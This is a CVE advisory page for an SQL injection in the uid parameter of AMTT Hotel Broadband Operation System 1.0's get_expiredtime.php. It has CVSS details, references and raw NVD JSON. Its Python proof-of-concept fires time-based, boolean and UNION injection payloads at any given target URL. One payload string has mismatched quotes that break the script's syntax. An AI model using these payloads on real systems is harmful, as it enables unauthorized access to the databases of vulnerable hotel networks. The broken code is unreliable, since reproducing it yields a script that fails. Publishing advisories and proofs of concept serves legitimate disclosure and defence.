CVE-2025-12253

Description

A vulnerability was determined in AMTT Hotel Broadband Operation System 1.0. Affected by this vulnerability is an unknown functionality of the file /user/portal/get_expiredtime.php. This manipulation of the argument uid causes sql injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:amttgroup:hibos:1.0:*:*:*:*:*:*:* - VULNERABLE

AMTT Hotel Broadband Operation System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-12253 SQL Injection PoC
Target: AMTT Hotel Broadband Operation System 1.0
File: /user/portal/get_expiredtime.php
Parameter: uid
"""

import requests
import sys

def test_sql_injection(url, uid_payload):
    """Test SQL injection on uid parameter"""
    target_url = f"{url}/user/portal/get_expiredtime.php"
    params = {'uid': uid_payload}
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    print(f"[*] Testing CVE-2025-12253 SQL Injection on {target}")
    
    # Test basic SQL injection - time-based blind SQLi
    # Using SLEEP() function to confirm vulnerability
    payloads = [
        "1' AND SLEEP(5)-- -",
        "1" OR SLEEP(5)-- -",
        "1' OR SLEEP(5) AND '1'='1"
    ]
    
    for payload in payloads:
        print(f"\n[*] Testing payload: {payload}")
        result = test_sql_injection(target, payload)
        if result:
            print(f"[+] Payload sent successfully")
            print(f"[+] Response length: {len(result)} characters")
    
    # Boolean-based blind SQL injection test
    boolean_payload = "1' AND 1=1-- -"
    print(f"\n[*] Testing boolean-based SQLi: {boolean_payload}")
    test_sql_injection(target, boolean_payload)
    
    # Union-based SQL injection test
    union_payload = "1' UNION SELECT NULL-- -"
    print(f"\n[*] Testing union-based SQLi: {union_payload}")
    result = test_sql_injection(target, union_payload)
    if result:
        print(f"[+] Possible SQL injection detected")
    
    print("\n[*] Testing complete. Review responses for SQL injection confirmation.")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12253
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12253
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12253/
[4] VulDB https://vuldb.com/cve/CVE-2025-12253
[5] https://github.com/guapiqing/cve/issues/3
[6] https://vuldb.com/?ctiid.329924
[7] https://vuldb.com/?id.329924
[8] https://vuldb.com/?submit.673967

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12253", "sourceIdentifier": "[email protected]", "published": "2025-10-27T09:15:37.187", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in AMTT Hotel Broadband Operation System 1.0. Affected by this vulnerability is an unknown functionality of the file /user/portal/get_expiredtime.php. This manipulation of the argument uid causes sql injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:amttgroup:hibos:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "AF7B4E54-4BE0-4F4D-915A-600EB71968D7"}]}]}], "references": [{"url": "https://github.com/guapiqing/cve/issues/3", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.329924", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329924", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673967", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}